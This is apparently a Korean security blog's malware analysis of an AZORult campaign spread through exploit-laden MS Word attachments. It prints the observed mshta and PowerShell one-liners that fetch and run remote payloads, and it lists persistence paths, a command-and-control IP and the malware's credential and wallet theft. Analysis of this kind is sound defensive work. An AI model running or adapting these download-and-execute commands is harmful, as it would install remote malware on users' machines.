본문 바로가기

벌새::Analysis

MS Word 취약점을 이용한 AZORult 악성코드 유포 주의 (2019.1.18)

반응형

최근 국내에서 메일 첨부 파일로 전파된 악성 MS Word 문서를 실행할 경우 취약점(Exploit)을 통해 AZORult 악성코드에 감염되는 사례가 확인되어 살펴보도록 하겠습니다.

 

 
 
참고로 AZORult 악성코드는 러시아어(Russian)를 사용하는 제작자를 통해 서비스되고 있으며, 웹 브라우저, FTP, 암호 화폐 지갑 등의 정보 유출 뿐만 아니라 랜섬웨어(Ransomware) 유포 등 다양한 악의적인 행위를 수행할 수 있는 것으로 보고되고 있습니다.
 
대표적인 감염 방식으로는 보안 패치가 제대로 설치되지 않은 MS Office 사용자가 MS Word 취약점을 포함한 악성 문서 파일을 실행할 경우 "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" 파일을 통해 코드 실행이 이루어지며 추가적으로 다음과 같은 다운로드를 시도할 수 있습니다.
 
mshta h**p://bit.ly/2Mjm*** &AAAAAAAAAAAAAAA C
 → h**p://vektorex.com/****/boss39Report.hta
mshta http://bit.ly/2Mg3*** &AAAAAAAAAAAAAAA C
 → h**p://vektorex.com/****/bill304Report.hta
mshta http://bit.ly/2MfA*** &AAAAAAAAAAAAAAA C
 → h**p://vektorex.com/****/edyiReport.hta
 

 

bit.ly 단축 URL 서비스를 통해 연결된 웹 페이지에서는 특정 .hta 파일을 실행하도록 구성되어 있습니다.

 

 

 

.hta 파일(SHA-1 : 8c7d6154ec4a95ef69cc33846abf9f5f374a0541)에서는 Windows Powershell 기능을 이용하여 특정 .exe 파일 다운로드를 하도록 구성되어 있는 스크립트가 포함되어 있습니다.

 

 

"C:\Windows\System32\cmd.exe" /c powershell (new-object System.Net.WebClienT).DownloadFile('h**p://vektorex.com/****/650890977.exe','%temp%\ufsdfs.exe'); Start '%temp%\ufsdfs.exe'

 
1차적으로 650890977.exe 악성 파일을 "C:\Users\%UserName%\AppData\Local\Temp\ufsdfs.exe" 파일명(SHA-1 : 19d1c41515df472d09f7602101d48eec7ad1ffd8 - 알약(ALYac) : Trojan.Agent.DNSM)으로 다운로드 및 실행합니다.
 

 

실행된 "%Temp%\ufsdfs.exe" 악성 파일은 "C:\Users\%UserName%\AppData\Roaming\oihsnfg\bsyguh.exe" 파일명으로 자기 자신을 복제한 후 실행합니다.

 

 

이를 통해 "C:\Users\%UserName%\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\oihsnfg.vbs" 시작프로그램 폴더 내에 oihsnfg.vbs 스크립트 파일을 추가하여 Windows 시작 시 자동 실행하도록 구성되어 있습니다.
 

 

실행된 악성코드는 104.233.105.159 IP 서버를 사용하는 C&C 서버와 최초 통신을 시도하는 것을 확인할 수 있습니다.
 

 

해당 C&C 서버에서는 AZORult 악성코드 계열임을 알 수 있으며, 2019년 1월 14일경부터 운영되고 있는 것으로 추정됩니다.

 

 

감염된 PC 환경에서는 "C:\Users\%UserName%\AppData\Local\Temp\2fda" 폴더를 생성하여 내부에 Mozilla Firefox 웹 브라우저 관련 파일 등의 다수의 모듈을 추가 생성하여 웹 브라우저에 저장된 인증서, 쿠키, 계정 정보 등을 수집하여 외부로 유출할 수 있습니다.

 

그 외에도 특정 위치에 존재하는 파일 수집, FTP / 메신저 / 이메일 계정 정보 수집, 암호 화폐 지갑 탈취, PC 정보 수집, 추가적인 파일 다운로드 등의 다양한 악의적 기능을 수행하며, 과거부터 지속적인 빌더(Builder) 버전 업데이트를 통해 기능을 추가하고 있는 것으로 보입니다.

 

그러므로 AZORult 악성코드에 감염되지 않기 위해서는 Windows, 웹 브라우저, Adobe Flash Player, MS Office 프로그램에 대한 최신 보안 패치를 꾸준히 업데이트하시기 바라며, 메일을 통해 수신된 첨부 파일 실행 시에는 항상 주의하여 피해를 당하는 일이 없도록 하시기 바랍니다.

728x90
반응형